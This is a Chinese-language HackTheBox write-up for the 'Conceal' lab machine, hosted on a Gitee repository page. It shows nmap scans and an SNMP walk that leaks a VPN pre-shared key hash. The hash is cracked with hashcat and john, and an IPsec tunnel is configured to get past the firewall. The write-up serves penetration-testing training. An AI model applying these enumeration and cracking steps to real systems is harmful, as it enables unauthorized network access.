登录 注册
开源 企业版 高校版 私有云 Gitee AI NEW
扫描微信二维码支付
取消
支付完成
Watch
不关注 关注所有动态 仅关注版本发行动态 关注但不提醒动态
1 Star 1 Fork 2

wuerror / hackthebox_oscp

代码 Issues 0 Pull Requests 0 Wiki 统计 流水线
服务
加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
项目仓库所选许可证以仓库主分支所使用许可证为准
克隆/下载
conceal.md 2.58 KB
一键复制 编辑 原始数据 按行查看 历史
wuerror 提交于 2022-06-17 21:00 . 修改文件路径

信息收集

扫描端口

nmap -sV -A -Pn 10.10.10.116

一个开放端口也没有,还以为靶机出问题了,重置了一次

重新进行udp端口扫描

sudo nmap -sU -sV -A 10.10.10.116

发现161,500

161 snmp

500/udp open isakmp?

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)
| snmp-netstat: 
|   TCP  0.0.0.0:21           0.0.0.0:0
|   TCP  0.0.0.0:80           0.0.0.0:0
|   TCP  0.0.0.0:135          0.0.0.0:0
|   TCP  0.0.0.0:445          0.0.0.0:0
|   TCP  0.0.0.0:49664        0.0.0.0:0
|   TCP  0.0.0.0:49665        0.0.0.0:0
|   TCP  0.0.0.0:49666        0.0.0.0:0
|   TCP  0.0.0.0:49667        0.0.0.0:0
|   TCP  0.0.0.0:49668        0.0.0.0:0
|_  UDP  0.0.0.0:123          *:*
| snmp-processes: 
|_  1: 
| snmp-sysdescr: Hardware: AMD64 Family 23 Model 1 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
|_  System uptime: 15m35.92s (93592 timeticks)
| snmp-win32-services: 
|   Power
|_  Server
|_snmp-win32-software: 
| snmp-win32-users: 
|_  Guest
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
Service Info: Host: Conceal

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   314.86 ms 10.10.14.1
2   417.80 ms 10.10.10.116

根据nmap扫描结果,使用snmpwalk扫描

snmpwalk -c public -v 1 10.10.10.116

conceal1

STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43" iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"

somd5解密为Dudecake1!

本地解密的话先hashid -m,给出可能类型。然后全部跑一遍,ntlm能解出来

hashcat -a 0 -m 1000 9C8B1A372B1878851BE2C097031B6E43  --wordlist /usr/share/wordlists/rockyou.txt

或者john破解

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt ntlm-hash.txt
john --show --format=nt ntlm-hash.txt

使用ike-scan扫描vpn信息

vim /etc/ipsec.conf

conn to-conceal
        authby=secret
        auto=route
        keyexchange=ikev1
        ike=3des-sha1-modp1024
        left=10.10.14.4
        right=10.10.10.116
        type=transport
        esp=3des-sha1
        rightprotoport=tcp

conceal3

配置/etc/ipsec.secrets

10.10.14.4 10.10.10.116 : PSK "Dudecake1!"
#解决不支持3des_cbc算法问题
sudo apt-get install  libstrongswan-extra-plugins
sudo apt-get install libstrongswan-standard-plugins
sudo ipsec start
sudo ipsec up to-conceal

建立连接绕过防火墙后,终于可以正常扫端口了

conceal4

马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
1
https://gitee.com/wuerror/hackthebox_oscp.git
git@gitee.com:wuerror/hackthebox_oscp.git
wuerror
hackthebox_oscp
hackthebox_oscp
master
点此查找更多帮助

搜索帮助

Git 命令在线学习 如何在 Gitee 导入 GitHub 仓库
Git 仓库基础操作
企业版和社区版功能对比
SSH 公钥设置
如何处理代码冲突
仓库体积过大,如何减小?
如何找回被删除的仓库数据
Gitee 产品配额说明
GitHub仓库快速导入Gitee及同步更新
什么是 Release(发行版)
将 PHP 项目自动发布到 packagist.org
评论
仓库举报
回到顶部